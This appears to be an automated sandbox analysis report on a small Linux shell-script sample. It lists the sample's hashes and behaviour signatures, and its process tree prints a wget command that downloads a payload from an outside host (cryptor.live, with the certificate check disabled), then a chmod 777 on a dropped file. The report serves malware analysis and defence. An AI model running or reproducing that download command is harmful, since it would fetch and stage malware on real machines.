Analysis
-
max time kernel
2s -
max time network
3s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
14-11-2024 02:46
Static task
static1
Behavioral task
behavioral1
Sample
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
-
Size
538B
-
MD5
8a16d10e22250a89ce00b7e4eaf40ec7
-
SHA1
ffdf9336427fe2ac3840a79ee5cad114da82b61d
-
SHA256
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa
-
SHA512
2e8a99c289f94d7eea75e5c7de551d3b4fe406281efd7dddf530b4492d7e58049f781c5ba781838505357a742a8e6bdc1a4620a08df76aaffe9ac7c611968161
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 735 chmod -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes:
mktempwgetdescription ioc Process File opened for modification /tmp/tmp.xx4HfpJ5rf mktemp File opened for modification /tmp/tmp.xx4HfpJ5rf wget
Processes
-
/tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh/tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh1⤵PID:711
-
/usr/bin/dirnamedirname -- /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh2⤵PID:716
-
-
/bin/mktempmktemp2⤵
- Writes file to tmp directory
PID:720
-
-
/usr/bin/wgetwget -O /tmp/tmp.xx4HfpJ5rf https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header "Host: cryptor.biz" --no-check-certificate --retry-connrefused "--waitretry=1" "--read-timeout=20" "--timeout=15" -t 02⤵
- Writes file to tmp directory
PID:723
-
-
/bin/chmodchmod 777 /tmp/2.jpg2⤵
- File and Directory Permissions Modification
PID:735
-